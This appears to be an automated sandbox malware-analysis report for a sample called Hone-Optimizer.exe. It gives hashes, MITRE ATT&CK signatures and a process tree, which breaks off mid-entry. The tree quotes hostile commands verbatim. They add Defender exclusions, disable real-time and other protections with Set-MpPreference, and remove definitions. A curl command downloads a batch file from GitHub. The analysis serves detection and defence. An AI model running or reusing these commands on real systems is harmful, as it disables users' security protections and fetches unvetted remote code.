07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65

Analysis

max time kernel
63s
max time network
64s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-11-2024 17:41

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Hone-Optimizer.exe
Size

7.7MB
MD5

baa9792a0bb9c8df5521b14e425dbe09
SHA1

1cf257b5c2ac3c84d468a3a6a3dbc846f7d50d5e
SHA256

07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
SHA512

45e7285cbbddb8ed61d4a39a09f15b032d8e39534139e96fe81f522fd9a644e2461080ff861062a35f3dec517a55bf584683b17dc2381c6f683f09ae06a4a636
SSDEEP

98304:8VeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbdk+QqnWv9JTSPhlVX:8AYmOshoKMuIkhVastRL5Di3tKb0SPJX

Score

8^/10

discovery execution persistence upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
3676	powershell.exe
4592	powershell.exe
924	powershell.exe
2956	powershell.exe
3156	powershell.exe

Executes dropped EXE 2 IoCs

Processes:

bound.exedismhost.exe

pid	Process
4760	bound.exe
940	dismhost.exe

Loads dropped DLL 36 IoCs

Processes:

Hone-Optimizer.exedismhost.exe

pid	Process
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
536	Hone-Optimizer.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe
940	dismhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
31	raw.githubusercontent.com
30	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
13	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
1616	powercfg.exe
1548	powercfg.exe
1412	powercfg.exe
532	powercfg.exe
4236	powercfg.exe
796	powercfg.exe
3448	powercfg.exe
2840	powercfg.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exe

pid	Process
2792	tasklist.exe

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000a000000023b6f-22.dat	upx
behavioral2/memory/536-26-0x00007FFA88D10000-0x00007FFA892F9000-memory.dmp	upx
behavioral2/files/0x000a000000023b64-28.dat	upx
behavioral2/memory/536-31-0x00007FFA9CD00000-0x00007FFA9CD23000-memory.dmp	upx
behavioral2/files/0x000a000000023b6d-30.dat	upx
behavioral2/memory/536-33-0x00007FFA9E060000-0x00007FFA9E06F000-memory.dmp	upx
behavioral2/files/0x000a000000023b67-39.dat	upx
behavioral2/memory/536-41-0x00007FFA9CAE0000-0x00007FFA9CB0D000-memory.dmp	upx
behavioral2/files/0x000a000000023b63-42.dat	upx
behavioral2/files/0x000a000000023b6a-46.dat	upx
behavioral2/memory/536-45-0x00007FFA9CCE0000-0x00007FFA9CCF9000-memory.dmp	upx
behavioral2/memory/536-48-0x00007FFA9B7B0000-0x00007FFA9B7D3000-memory.dmp	upx
behavioral2/files/0x000a000000023b72-49.dat	upx
behavioral2/memory/536-50-0x00007FFA88790000-0x00007FFA88907000-memory.dmp	upx
behavioral2/files/0x000a000000023b69-51.dat	upx
behavioral2/memory/536-54-0x00007FFA983B0000-0x00007FFA983C9000-memory.dmp	upx
behavioral2/files/0x000a000000023b71-55.dat	upx
behavioral2/memory/536-57-0x00007FFA9E050000-0x00007FFA9E05D000-memory.dmp	upx
behavioral2/files/0x000a000000023b6b-56.dat	upx
behavioral2/files/0x000a000000023b6c-59.dat	upx
behavioral2/memory/536-60-0x00007FFA97EE0000-0x00007FFA97F13000-memory.dmp	upx
behavioral2/files/0x000a000000023b6e-61.dat	upx
behavioral2/memory/536-66-0x00007FFA97610000-0x00007FFA976DD000-memory.dmp	upx
behavioral2/memory/536-69-0x00007FFA9CD00000-0x00007FFA9CD23000-memory.dmp	upx
behavioral2/memory/536-67-0x00007FFA88270000-0x00007FFA88790000-memory.dmp	upx
behavioral2/memory/536-65-0x00007FFA88D10000-0x00007FFA892F9000-memory.dmp	upx
behavioral2/files/0x000a000000023b66-70.dat	upx
behavioral2/memory/536-76-0x00007FFA98160000-0x00007FFA9816D000-memory.dmp	upx
behavioral2/files/0x000a000000023b68-74.dat	upx
behavioral2/memory/536-72-0x00007FFA97CC0000-0x00007FFA97CD4000-memory.dmp	upx
behavioral2/files/0x000a000000023b73-78.dat	upx
behavioral2/memory/536-80-0x00007FFA87DE0000-0x00007FFA87EFC000-memory.dmp	upx
behavioral2/memory/536-114-0x00007FFA9B7B0000-0x00007FFA9B7D3000-memory.dmp	upx
behavioral2/memory/536-134-0x00007FFA87DE0000-0x00007FFA87EFC000-memory.dmp	upx
behavioral2/memory/536-131-0x00007FFA88270000-0x00007FFA88790000-memory.dmp	upx
behavioral2/memory/536-144-0x00007FFA97610000-0x00007FFA976DD000-memory.dmp	upx
behavioral2/memory/536-143-0x00007FFA97EE0000-0x00007FFA97F13000-memory.dmp	upx
behavioral2/memory/536-142-0x00007FFA9E050000-0x00007FFA9E05D000-memory.dmp	upx
behavioral2/memory/536-141-0x00007FFA983B0000-0x00007FFA983C9000-memory.dmp	upx
behavioral2/memory/536-140-0x00007FFA88790000-0x00007FFA88907000-memory.dmp	upx
behavioral2/memory/536-139-0x00007FFA9B7B0000-0x00007FFA9B7D3000-memory.dmp	upx
behavioral2/memory/536-138-0x00007FFA9CCE0000-0x00007FFA9CCF9000-memory.dmp	upx
behavioral2/memory/536-137-0x00007FFA9CAE0000-0x00007FFA9CB0D000-memory.dmp	upx
behavioral2/memory/536-136-0x00007FFA9E060000-0x00007FFA9E06F000-memory.dmp	upx
behavioral2/memory/536-135-0x00007FFA9CD00000-0x00007FFA9CD23000-memory.dmp	upx
behavioral2/memory/536-133-0x00007FFA98160000-0x00007FFA9816D000-memory.dmp	upx
behavioral2/memory/536-132-0x00007FFA97CC0000-0x00007FFA97CD4000-memory.dmp	upx
behavioral2/memory/536-120-0x00007FFA88D10000-0x00007FFA892F9000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

Processes:

Dism.exedismhost.exe

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
4844	sc.exe
4060	sc.exe
888	sc.exe
924	sc.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d4141155d34ac580000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d4141150000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d414115000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d414115000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d41411500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "157"	LogonUI.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
3840	reg.exe
908	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2956	powershell.exe
2956	powershell.exe
3676	powershell.exe
3676	powershell.exe
2956	powershell.exe
3156	powershell.exe
3156	powershell.exe
3676	powershell.exe
3156	powershell.exe
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe
924	powershell.exe
924	powershell.exe
924	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetasklist.exepowershell.exepowershell.exeWMIC.exeDism.exepowershell.exevssvc.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2792	tasklist.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeBackupPrivilege	2156	Dism.exe
Token: SeRestorePrivilege	2156	Dism.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeBackupPrivilege	2016	vssvc.exe
Token: SeRestorePrivilege	2016	vssvc.exe
Token: SeAuditPrivilege	2016	vssvc.exe
Token: SeDebugPrivilege	924	powershell.exe
Token: SeIncreaseQuotaPrivilege	1320	WMIC.exe
Token: SeSecurityPrivilege	1320	WMIC.exe
Token: SeTakeOwnershipPrivilege	1320	WMIC.exe
Token: SeLoadDriverPrivilege	1320	WMIC.exe
Token: SeSystemProfilePrivilege	1320	WMIC.exe
Token: SeSystemtimePrivilege	1320	WMIC.exe
Token: SeProfSingleProcessPrivilege	1320	WMIC.exe
Token: SeIncBasePriorityPrivilege	1320	WMIC.exe
Token: SeCreatePagefilePrivilege	1320	WMIC.exe
Token: SeBackupPrivilege	1320	WMIC.exe
Token: SeRestorePrivilege	1320	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

LogonUI.exe

pid	Process
2860	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Hone-Optimizer.exeHone-Optimizer.execmd.execmd.execmd.execmd.execmd.execmd.exebound.execmd.exeDism.exe

description	pid	Process	procid_target
PID 3144 wrote to memory of 536	3144	Hone-Optimizer.exe	83
PID 3144 wrote to memory of 536	3144	Hone-Optimizer.exe	83
PID 536 wrote to memory of 1180	536	Hone-Optimizer.exe	87
PID 536 wrote to memory of 1180	536	Hone-Optimizer.exe	87
PID 536 wrote to memory of 4844	536	Hone-Optimizer.exe	88
PID 536 wrote to memory of 4844	536	Hone-Optimizer.exe	88
PID 536 wrote to memory of 3448	536	Hone-Optimizer.exe	91
PID 536 wrote to memory of 3448	536	Hone-Optimizer.exe	91
PID 536 wrote to memory of 468	536	Hone-Optimizer.exe	92
PID 536 wrote to memory of 468	536	Hone-Optimizer.exe	92
PID 536 wrote to memory of 2136	536	Hone-Optimizer.exe	93
PID 536 wrote to memory of 2136	536	Hone-Optimizer.exe	93
PID 536 wrote to memory of 2632	536	Hone-Optimizer.exe	97
PID 536 wrote to memory of 2632	536	Hone-Optimizer.exe	97
PID 1180 wrote to memory of 2956	1180	cmd.exe	99
PID 1180 wrote to memory of 2956	1180	cmd.exe	99
PID 4844 wrote to memory of 3676	4844	cmd.exe	100
PID 4844 wrote to memory of 3676	4844	cmd.exe	100
PID 2136 wrote to memory of 2792	2136	cmd.exe	101
PID 2136 wrote to memory of 2792	2136	cmd.exe	101
PID 3448 wrote to memory of 3156	3448	cmd.exe	102
PID 3448 wrote to memory of 3156	3448	cmd.exe	102
PID 2632 wrote to memory of 4816	2632	cmd.exe	103
PID 2632 wrote to memory of 4816	2632	cmd.exe	103
PID 468 wrote to memory of 4760	468	cmd.exe	105
PID 468 wrote to memory of 4760	468	cmd.exe	105
PID 4760 wrote to memory of 688	4760	bound.exe	107
PID 4760 wrote to memory of 688	4760	bound.exe	107
PID 688 wrote to memory of 2220	688	cmd.exe	108
PID 688 wrote to memory of 2220	688	cmd.exe	108
PID 688 wrote to memory of 3840	688	cmd.exe	109
PID 688 wrote to memory of 3840	688	cmd.exe	109
PID 688 wrote to memory of 4868	688	cmd.exe	110
PID 688 wrote to memory of 4868	688	cmd.exe	110
PID 688 wrote to memory of 1552	688	cmd.exe	111
PID 688 wrote to memory of 1552	688	cmd.exe	111
PID 688 wrote to memory of 908	688	cmd.exe	112
PID 688 wrote to memory of 908	688	cmd.exe	112
PID 688 wrote to memory of 888	688	cmd.exe	113
PID 688 wrote to memory of 888	688	cmd.exe	113
PID 688 wrote to memory of 2680	688	cmd.exe	121
PID 688 wrote to memory of 2680	688	cmd.exe	121
PID 688 wrote to memory of 4656	688	cmd.exe	122
PID 688 wrote to memory of 4656	688	cmd.exe	122
PID 688 wrote to memory of 2156	688	cmd.exe	123
PID 688 wrote to memory of 2156	688	cmd.exe	123
PID 2156 wrote to memory of 940	2156	Dism.exe	124
PID 2156 wrote to memory of 940	2156	Dism.exe	124
PID 688 wrote to memory of 3452	688	cmd.exe	126
PID 688 wrote to memory of 3452	688	cmd.exe	126
PID 688 wrote to memory of 4592	688	cmd.exe	127
PID 688 wrote to memory of 4592	688	cmd.exe	127
PID 688 wrote to memory of 924	688	cmd.exe	131
PID 688 wrote to memory of 924	688	cmd.exe	131
PID 688 wrote to memory of 1548	688	cmd.exe	135
PID 688 wrote to memory of 1548	688	cmd.exe	135
PID 688 wrote to memory of 732	688	cmd.exe	136
PID 688 wrote to memory of 732	688	cmd.exe	136
PID 688 wrote to memory of 1532	688	cmd.exe	137
PID 688 wrote to memory of 1532	688	cmd.exe	137
PID 688 wrote to memory of 2612	688	cmd.exe	138
PID 688 wrote to memory of 2612	688	cmd.exe	138
PID 688 wrote to memory of 4312	688	cmd.exe	139
PID 688 wrote to memory of 4312	688	cmd.exe	139

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3144
- C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
  "C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4760
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7501.tmp\7512.tmp\7513.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:688
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:2220
      - C:\Windows\system32\reg.exe
        
        reg add HKLM /F
        6⤵
        Modifies registry key
        
        PID:3840
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:4868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
        6⤵
        
        PID:1552
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:908
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "Disclaimer"
        6⤵
        
        PID:888
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Hone" /v "Disclaimer" /f
        6⤵
        
        PID:2680
      - C:\Windows\system32\curl.exe
        
        curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
        6⤵
        
        PID:4656
      - C:\Windows\system32\Dism.exe
        
        dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
        6⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\dismhost.exe {B7017E6D-56AB-493C-89C1-A60A011D1DE6}
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:940
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
        6⤵
        
        PID:3452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4592
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c date /t
        6⤵
        
        PID:1548
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\11.12.2024\HKLM.reg /y
        6⤵
        
        PID:732
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\11.12.2024\HKCU.reg /y
        6⤵
        
        PID:1532
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:2612
      - C:\Windows\System32\choice.exe
        
        C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
        6⤵
        
        PID:4312
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:1288
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:1172
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1320
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:4844
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:4476
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4944
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:3616
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:3880
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:1572
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:1976
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3012
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4380
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:1820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:5012
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:4840
      - C:\Windows\system32\cmd.exe
        
